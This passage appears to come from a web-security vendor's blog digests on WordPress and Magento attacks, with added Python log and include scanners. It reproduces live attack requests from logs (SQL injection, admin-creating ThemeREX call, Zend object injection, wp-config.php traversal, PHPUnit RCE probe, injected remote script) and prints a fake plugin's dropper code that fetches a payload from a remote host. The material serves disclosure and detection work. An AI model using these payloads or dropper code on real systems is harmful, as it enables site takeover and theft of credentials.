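    '203.0.113.13 -- POST -- /wp-admin/admin-ajax.php -- action=bwg_frontend_data&bwg_search_0=1%23%22%29%29%2F%2A%2A%2FUNION%2F%2A%2A%2FALL%2F%2A%2A%2FSELECT%2F%2A%2A%2FTABLE_NAME%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.tables%23&type_0=album -- 2020-05-17',
    '203.0.113.14 - - [14/May/2020:14:45:54 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1"',
    '203.0.113.15 - - [14/May/2020:10:00:00 +0000] "GET /wp-content/uploads/2020/05/photo.jpg HTTP/1.1"',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_RECORDS).items():
        print(ip, hits)
```

The fingerprint rule on its own is noisy (legitimate visitors fetch the same assets); it is useful as a precursor signal only when the same source later hits an abused action.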

Detected IPs

ThemeREX Addons

Back in February, we shared information about a critical vulnerability in ThemeREX Addons that was disclosed to the public and later on massively exploited by attackers.

Here is the full working exploit that attackers are using to compromise vulnerable sites.

195.154.177.210 -- post -- /wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login=ndvtzaifnz&user_pass=6Wlh6SA0RT -- - -- 2020-04-04
Detected IPs

Old Magento Versions Still Exploited

Unpatched Magento sites will always be targeted by attackers, which is why we encourage users to apply all security patches in a timely manner. Multiple vulnerabilities were fixed two years ago, and attackers are still taking advantage of them.

We've listed some of the exploits attackers are using to compromise vulnerable sites below.

Magento Made Cache - Object Injection

154.9.169.173 -- GET -- http://site.com/madecache/varnish/esi/?misc=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuYWJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW91dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047fX19fQ== -- - -- 2020-04-15

Magento Magecart - Object Injection

23.229.39.178 -- POST -- /freegift/cart/gurlgift -- data=[...] -- 2020-04-14

Magento Core - SQL Injection

45.11.24.151 -- GET -- /catalog/product_frontend_action/synchronize?ids%5B0%5D%5Badded_at%5D=&type_id=recently_products&ids%5B0%5D%5Bproduct_id%5D%5Bto%5D=%29%29%29+OR+%28SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+123%3D123%29+--+-&ids%5B0%5D%5Bproduct_id%5D%5Bfrom%5D=%3F -- - -- 2020-04-26

Public exploits already exist for all of the components listed above. We strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

Fake M-Shield WordPress Plugin

During a recent malware investigation, we found a fake WordPress plugin called M-Shield. We also found an almost identical plugin under the name kingof, with malicious code hosted in the file ./wp-content/plugins/kingof/kingof.php.

Based on the patterns commonly used for malware droppers, we suspect that this same plugin is circulating with a variety of different names. Since neither the M-Shield nor the kingof plugins exist in the official WordPress repository, the malicious component was most likely injected into the WordPress website after the initial compromise.

The plugin code loops through an array of “random” files, checking whether each one exists with a file size of at least 1000 bytes. If it does not, the script downloads the malicious wsos.txt file from 24hod[.]sk using the function file_get_contents() and writes its contents into the files from the $amb array.

<?php
function shield_01()
{
    $amb = array('wp-pwd.php', 'wp-shield.php', 'wp-logout.php', 'wp-config-proto.php', 'wp-content/themes/ms.cache.php');
    foreach($amb as $f) {
        $f=ABSPATH.$f;
        if(!file_exists($f)||filesize($f)<1000) {
            if(!$wsd)
                $wsd = file_get_contents('hxxp://www[.]24hod[.]sk/colours/layout/wsos.txt');
            if($wsd)
                file_put_contents($f,$wsd);
        }
    }
}

Once the malicious payload has been delivered, the plugin uses two different methods to execute the malware.

First, the malware leverages a WordPress function called add_action() that attempts to run shield_01() when the init hook is executed. If the function add_action() doesn’t exist, the malicious code calls shield_01() directly.

if(function_exists('add_action')){
    add_action( 'init', 'shield_01');
}else{
    shield_01();
}

It’s important to note that attackers can leverage plugin vulnerabilities and other malicious code even if a plugin is deactivated in your WordPress environment.

We highly recommend regularly auditing your plugins and themes and removing any unknown or unused components from your website. Our free guides offer more WordPress security hardening tips to help you secure your environment.

Fake License.txt File Loaded Through PHP Include

Our team recently found a malicious injection located within a PHP include. The redirect occurs via the include function, which loads a file inconspicuously named license.txt.

During our investigation, we located the license.txt include within header.php of the WordPress theme.

include('license.txt'); ?>
        </header> <!-- #main-header -->
    <?php
        $main_header = ob_get_clean();

        /**
         * Filters the HTML output for the main header.
         *
         * @since ??
         *
         * @param string $main_header
         */
        echo apply_filters( 'et_html_main_header', $main_header );
    ?>
        <div id="et-main-area">
    <?php
        /**
         * Fires after the header, before the main content is output.
         *
         * @since ??
         */
        do_action( 'et_before_main_content' );

The license.txt file is essentially a redirect: it uses HTML and JavaScript to send site visitors to the malicious website https://times2day[.]com, a domain registered on February 6th, 2020.

<?php
<html>
<meta http-equiv="X-UA-Compatible"
content="IE-Edge">
   <meta name="viewport" content="width=device-width,
initial scale=1">
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.all.min.js"></script>
   <link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.min.css'>
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
   </script>
   <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js">
    </script>
   <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
</head>
<body>
<script>
swal({
    title: 'Oh, you must be visiting us!!!! ',
    text: 'Getting access..... ',
    icon: 'success',
    timer: 2000,
    buttons: false,
})
.then(() => {
    window.location.href = "https://times2day.com/";
})
</script>
</body>
</html>

?>

To detect these types of malicious injections, site owners can scan websites for known malware, blacklisting status, website errors, out-of-date software, and malicious code.
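One concrete check for this class of injection, written as an added example rather than code from the original post: a Python scanner that looks for include/require statements whose target lacks a PHP extension (as with license.txt above), then inspects the included file for a PHP open tag (meaning the include executes it as code) and for a JavaScript or meta-refresh redirect. The header.php and license.txt it scans are constructed samples modelled on the injection described above, the redirect domain is a placeholder, and the regex only catches includes of literal string paths, not ones built from variables or constants.

```python
"""Look for PHP include/require statements that pull in files without a PHP
extension (such as the license.txt above) and inspect what those files contain.
Added example; not code from the original post."""
import re
import tempfile
from pathlib import Path

INCLUDE_RE = re.compile(
    r"\b(include|include_once|require|require_once)\s*\(?\s*['\"]([^'\"]+)['\"]\s*\)?\s*;",
    re.IGNORECASE,
)
REDIRECT_RE = re.compile(
    r"window\.location(?:\.href)?\s*=|http-equiv\s*=\s*['\"]refresh['\"]", re.IGNORECASE
)
PHP_EXTENSIONS = (".php", ".inc", ".phtml")


def find_suspicious_includes(php_source: str) -> list[str]:
    """Return the literal paths included/required whose extension is not a PHP one."""
    return [
        m.group(2)
        for m in INCLUDE_RE.finditer(php_source)
        if not m.group(2).lower().endswith(PHP_EXTENSIONS)
    ]


def classify_included_file(content: str) -> list[str]:
    """Why an included non-PHP file is dangerous: a PHP open tag means the include
    executes it as code; a JS/meta redirect means visitors are sent elsewhere."""
    flags = []
    if "<?php" in content or "<?=" in content:
        flags.append("php-tag")
    if REDIRECT_RE.search(content):
        flags.append("js-redirect")
    return flags


def scan_tree(root: Path) -> dict[str, dict[str, list[str]]]:
    """Walk a theme/plugin directory and map each PHP file to its suspicious includes
    and the flags found in the included file (resolved relative to the including file)."""
    findings: dict[str, dict[str, list[str]]] = {}
    for php_file in sorted(root.rglob("*.php")):
        source = php_file.read_text(errors="replace")
        for rel in find_suspicious_includes(source):
            target = php_file.parent / rel
            if target.is_file():
                flags = classify_included_file(target.read_text(errors="replace"))
            else:
                flags = ["missing"]
            findings.setdefault(str(php_file.relative_to(root)), {})[rel] = flags
    return findings


# Constructed samples modelled on the injection described above; the domain is a placeholder.
HEADER_PHP = "<?php get_header(); include('license.txt'); ?>\n</header>\n"
LICENSE_TXT = (
    "<?php\n<html><body><script>\nswal({title: 'x'}).then(() => {\n"
    "  window.location.href = \"https://redirect-target.invalid/\";\n});\n"
    "</script></body></html>\n?>\n"
)
CLEAN_PHP = "<?php require_once('inc/helpers.php'); ?>\n"


def demo() -> dict:
    """Build a throwaway theme directory from the constructed samples and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "inc").mkdir()
        (root / "inc" / "helpers.php").write_text("<?php // harmless\n")
        (root / "functions.php").write_text(CLEAN_PHP)
        (root / "header.php").write_text(HEADER_PHP)
        (root / "license.txt").write_text(LICENSE_TXT)
        return scan_tree(root)


if __name__ == "__main__":
    for php_file, includes in demo().items():
        for included, flags in includes.items():
            print(f"{php_file}: includes {included} -> {', '.join(flags)}")
```

Run against a real theme directory by calling scan_tree(Path("/path/to/wp-content/themes/yourtheme")); a hit on a .txt, .ico or image file that also carries "php-tag" is the pattern described above and warrants pulling the file for review.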

Vulnerabilities Digest: March 2020

Fixed Plugins and Vulnerabilities

| Plugin | Vulnerability | Patched Version | Installs |
|---|---|---|---|
| Cookiebot | Reflected Cross-Site Scripting | 3.6.1 | 40000 |
| Data Tables Generator By Supsystic | Authenticated Stored XSS | 1.9.92 | 30000 |
| WPvivid Backup | Database Leak | 0.9.36 | 40000 |
| Advanced Ads | Reflected XSS | 1.17.4 | 100000 |
| Category Page Icons | Arbitrary File Upload/Deletion | 0.9.1 | Closed |
| Custom Post Type UI | CSRF to Stored XSS | 1.7.4 | 800000 |
| Fruitful | Authenticated Stored XSS | 3.8.2 | 9000 |
| responsive-add-ons | Unprotected AJAX Endpoints | 2.2.6 | 40000 |
| Import Export WordPress Users | Authenticated Arbitrary User Creation | 1.3.9 | 30000 |
| LearnPress | Privilege Escalation | 3.2.6.7 | 70000 |
| Multiple Plugins | Unauthenticated RCE via PHPUnit | all | - |
| Multiple WebToffee Plugins | CSRF | 1.3.3 | 2000 |
| Popup Builder | Multiple Issues | 3.64.1 | 100000 |
| Viral Optins | Arbitrary File Upload | all | Closed |
| WordPress File Upload | Directory Traversal to RCE | 4.13.0 | 20000 |
| WPML | Cross Site Request Forgery to RCE | 4.3.7 | 30000 |


Highlights for March 2020

Cross-site scripting and cross-site request forgery vulnerabilities were the most prevalent this month. Attackers took advantage of missing access restrictions on critical functions and of insufficient sanitization of user input.

Ongoing Campaign Targets Plugin Vulnerabilities

An ongoing malicious campaign that we’ve been actively tracking since early 2019 continues targeting new plugin vulnerabilities to inject malicious domains.

Malicious domain injected during this month: clon[.]collectfasttracks[.]com

Social Metrics Tracker

185.50.197.12 - --3e87eee3d[...]script type=text/javascript src='https://clon.collectfasttracks.com/hos?&v5'></script>\x0D\x0A--3e87eee3d99c55ee9a39a59184ff3f05905a195557207837f3015d906347--\x0D\x0A [15/Mar/2020:19:55:14 +0000] "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1&section=gapi HTTP/1.1"

Simple Fields

185.50.197.12 - --3e87eee3d[...]script type=text/javascript src='https://clon.collectfasttracks.com/hos?&v5'></script>\x0D\x0A--3e87eee3d99c55ee9a39a59184ff3f05905a195557207837f3015d906347--\x0D\x0A [15/Mar/2020:19:55:14 +0000] "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1&section=gapi HTTP/1.1"

Pricing Table by Supsystic

185.212.128.162 - - [18/Mar/2020] "GET /wp-admin/admin-ajax.php?action=getJSONExportTable&tables[]=8&reqType=ajax&mod=tables&pl=pts HTTP/1.1"

Brizy – Page Builder

207.180.198.200 - - [12/Mar/2020] "GET /wp-content/plugins/brizy/admin/site-settings.php HTTP/1.1" 

WP Security Audit Log

207.180.198.200 - - [12/Mar/2020] "GET /wp-content/plugins/brizy/admin/site-settings.php HTTP/1.1" 

WordPress WP User Frontend

185.219.168.18 - - [17/Mar/2020] "GET /wp-admin/admin-ajax.php?action=wpuf_file_upload HTTP/1.1"

Adblock Blocker

185.219.168.18 - --0747fb1e8d3cfc0d658e7a77f51c7758\x0D\x0AContent-Disposition: form-data; name=\x22popimg\x22; filename=\x22settings_auto.php\x22\x0D\x0A\x0D\x0A[...] echo \x22not exits\x22;\x0D\x0Aecho \x22done .\x5Cn \x22 ;\x0D\x0A\x0D\x0A@unlink(__FILE__);\x0D\x0A?>\x0D\x0A\x0D\x0A--0747fb1e8d3cfc0d658e7a77f51c7758--\x0D\x0A [17/Mar/2020:13:25:45 +0000] "POST /wp-admin/admin-ajax.php?action=getcountryuser&cs=2 HTTP/1.1" 

Multiple Plugins - Access to Sensitive Files

113.162.159.230 -- GET -- /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/themes/ctu/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/themes/ctu/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/themes/ctu/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23
113.162.159.230 -- GET -- /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23

Multiple Plugins Affected by an Old Vulnerability in PHPUnit

As seen in January, attackers continue to leverage an RCE in PHPUnit alongside several plugin vulnerabilities disclosed in the past month.

Unpatched versions of PHPUnit prior to 4.8.28 and 5.6.3 allow remote attackers to execute arbitrary PHP code via HTTP POST data.

Jekyll-exporter

118.27.25.88 - <?php  echo 'RCE_VULN|'; echo php_uname();?> [13/Mar/2020] "POST //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"

Wp-heyloyalty

118.27.5.203 - <?php  echo 'RCE_VULN|'; echo php_uname();?> [12/Mar/2020] "POST //wp-content/plugins/wp-heyloyalty/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"
[...]
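The access-log entries in this campaign share patterns that are easy to flag automatically: URL-encoded ../ sequences that reach wp-config.php, POST requests to PHPUnit's eval-stdin.php under a plugin's vendor directory, and (where the request body is logged, as in the Adblock Blocker line) multipart uploads whose filename ends in .php. The following Python script is an added example, not part of the original digest: it parses both log layouts shown above, fully URL-decodes the request target so double-encoded traversal is caught too, and groups findings per source IP. Two of the sample lines are quoted from the digest; the benign page view and the shortened multipart-upload line are constructed.

```python
"""Flag the request patterns shown in this digest in web-server access logs:
encoded ../ traversal toward wp-config.php, POSTs to PHPUnit's eval-stdin.php,
and multipart uploads of .php files when the body is logged.
Added example; not code from the original digest."""
import re
from urllib.parse import unquote

# Layout of most lines above: IP ... "METHOD target HTTP/x.y"
CLF_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>GET|POST|HEAD|PUT|PATCH|DELETE|OPTIONS) (?P<target>\S+) HTTP/[\d.]+"'
)
# Layout of the "Access to Sensitive Files" lines: IP -- METHOD -- target -- ...
DASH_RE = re.compile(r"^(?P<ip>\S+) -- (?P<method>[A-Z]+) -- (?P<target>\S+) --")
EVAL_STDIN = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
# Multipart filename ending in .php; the quote may be logged literally or escaped as \x22
PHP_UPLOAD_RE = re.compile(r'filename=(?:\\x22|")[^"\\]*\.php(?:\\x22|")')


def fully_decode(target: str, rounds: int = 3) -> str:
    """Undo URL encoding repeatedly so that double-encoded ..%252F is caught too."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def parse_line(line: str):
    """Return (ip, method, target) for either log layout, or None if it matches neither."""
    m = CLF_RE.match(line.strip()) or DASH_RE.match(line.strip())
    return (m.group("ip"), m.group("method"), m.group("target")) if m else None


def classify_request(method: str, target: str) -> list[str]:
    """Reasons a single request is suspicious, judged on the decoded target."""
    decoded = fully_decode(target)
    path = decoded.partition("?")[0]
    reasons = []
    if "../" in decoded or "..\\" in decoded:
        reasons.append("traversal-to-wp-config" if "wp-config.php" in decoded else "path-traversal")
    if method == "POST" and path.rstrip("/").endswith(EVAL_STDIN):
        reasons.append("phpunit-eval-stdin")
    return reasons


def analyze_line(line: str):
    """Parse one log line and attach the reasons it is suspicious (possibly none)."""
    parsed = parse_line(line)
    if parsed is None:
        return None
    ip, method, target = parsed
    reasons = classify_request(method, target)
    if PHP_UPLOAD_RE.search(line):
        reasons.append("php-file-upload")
    return {"ip": ip, "method": method, "target": target, "reasons": reasons}


def suspicious_ips(lines) -> dict[str, set[str]]:
    """Group every reason seen per source IP; IPs with only clean requests are omitted."""
    hits: dict[str, set[str]] = {}
    for line in lines:
        result = analyze_line(line)
        if result and result["reasons"]:
            hits.setdefault(result["ip"], set()).update(result["reasons"])
    return hits


SAMPLE_LOG = [
    # Two entries quoted from the digest above
    '113.162.159.230 -- GET -- /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php -- - -- 2020-03-23',
    '118.27.25.88 - <?php  echo \'RCE_VULN|\'; echo php_uname();?> [13/Mar/2020] "POST //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"',
    # Constructed: a shortened multipart upload in the digest's body-logging layout
    r'185.219.168.18 - --0747fb1e[...]Content-Disposition: form-data; name=\x22popimg\x22; filename=\x22settings_auto.php\x22\x0D\x0A[...]--\x0D\x0A [17/Mar/2020:13:25:45 +0000] "POST /wp-admin/admin-ajax.php?action=getcountryuser&cs=2 HTTP/1.1"',
    # Constructed: an ordinary page view that must not be flagged
    '198.51.100.7 - - [23/Mar/2020:10:00:00 +0000] "GET /index.php?p=12 HTTP/1.1" 200 5123',
]

if __name__ == "__main__":
    for ip, reasons in sorted(suspicious_ips(SAMPLE_LOG).items()):
        print(ip, ", ".join(sorted(reasons)))
```

Feed it your own access log with suspicious_ips(open("access.log")); the traversal check deliberately keys on the decoded path rather than on any plugin name, so it also catches the same technique aimed at plugins not listed here.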

Detected IPs

163.44.149.193
118.27.5.203
118.27.25.88
185.219.168.18
77.71.115.52
182.161.69.114
5.101.0.209
190.117.233.1

Public exploits already exist for all of the components listed above. We strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.